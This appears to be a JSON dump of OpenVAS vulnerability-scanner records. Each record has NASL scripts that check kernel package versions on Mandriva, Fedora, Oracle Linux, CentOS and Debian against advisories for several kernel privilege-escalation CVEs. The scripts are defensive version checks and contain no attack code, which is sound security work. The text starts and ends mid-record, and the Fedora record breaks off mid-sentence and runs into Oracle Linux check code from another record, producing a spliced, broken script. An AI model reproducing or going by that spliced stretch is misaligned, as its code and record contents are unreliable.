{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-server-latest\", rpm:\"rt2860-kernel-server-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel\", rpm:\"rt2870-kernel~2.6.27.56~desktop~1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-desktop586-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-server-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-desktop586-latest\", rpm:\"rt2870-kernel-desktop586-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-desktop-latest\", rpm:\"rt2870-kernel-desktop-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-server-latest\", rpm:\"rt2870-kernel-server-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel\", rpm:\"rtl8187se-kernel~2.6.27.56~desktop~1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-server-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-server-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop586-latest\", rpm:\"rtl8187se-kernel-desktop586-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop-latest\", rpm:\"rtl8187se-kernel-desktop-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-server-latest\", rpm:\"rtl8187se-kernel-server-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel\", rpm:\"slmodem-kernel~2.6.27.56~desktop~1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-desktop586-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-server-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-desktop586-latest\", rpm:\"slmodem-kernel-desktop586-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-desktop-latest\", rpm:\"slmodem-kernel-desktop-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-server-latest\", rpm:\"slmodem-kernel-server-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel\", rpm:\"squashfs-lzma-kernel~2.6.27.56~desktop~1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop586-latest\", rpm:\"squashfs-lzma-kernel-desktop586-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop-latest\", rpm:\"squashfs-lzma-kernel-desktop-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-server-latest\", rpm:\"squashfs-lzma-kernel-server-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel\", rpm:\"tp_smapi-kernel~2.6.27.56~desktop~1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-server-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-server-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop586-latest\", rpm:\"tp_smapi-kernel-desktop586-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop-latest\", rpm:\"tp_smapi-kernel-desktop-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-server-latest\", rpm:\"tp_smapi-kernel-server-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel\", rpm:\"vboxadd-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-desktop586-latest\", rpm:\"vboxadd-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-desktop-latest\", rpm:\"vboxadd-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-server-latest\", 
rpm:\"vboxadd-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel\", rpm:\"vboxvfs-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop586-latest\", rpm:\"vboxvfs-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop-latest\", rpm:\"vboxvfs-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-server-latest\", rpm:\"vboxvfs-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel\", rpm:\"vhba-kernel~2.6.27.56~desktop~1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vhba-kernel-2.6.27.56-desktop586-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-server-1mnb\", rpm:\"vhba-kernel-2.6.27.56-server-1mnb~1.0.0~1.svn304.1mdv2009.0\", 
rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-desktop586-latest\", rpm:\"vhba-kernel-desktop586-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-desktop-latest\", rpm:\"vhba-kernel-desktop-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-server-latest\", rpm:\"vhba-kernel-server-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel\", rpm:\"virtualbox-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-server-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-desktop586-latest\", rpm:\"virtualbox-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-desktop-latest\", rpm:\"virtualbox-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-server-latest\", rpm:\"virtualbox-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:12", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2007-2298", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-4573"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861315", "href": "http://plugins.openvas.org/nasl.php?oid=861315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2007-2298\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 7\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:34", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for kernel CESA-2010:0792 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880640", "href": "http://plugins.openvas.org/nasl.php?oid=880640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0792 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n \n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n \n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n \n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. 
The system must be rebooted for this update to\n take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\");\n script_id(880640);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0792\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"CentOS Update for kernel CESA-2010:0792 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:40", "description": "The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1864-1 (linux-2.6.24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64747", "href": "http://plugins.openvas.org/nasl.php?oid=64747", "sourceData": "# OpenVAS Vulnerability Test\n# 
$Id: deb_1864_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1864-1 (linux-2.6.24)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered in the Linux kernel that may lead\nto privilege escalation. 
The Common Vulnerabilities and Exposures\nproject identifies the following problem:\n\nCVE-2009-2692\n\nTavis Ormandy and Julien Tinnes discovered an issue with how the\nsendpage function is initialized in the proto_ops structure.\nLocal users can exploit this vulnerability to gain elevated\nprivileges.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.8etch3.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201864-1\";\n\n\nif(description)\n{\n script_id(64747);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1864-1 (linux-2.6.24)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.24-etchnhalf.1\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 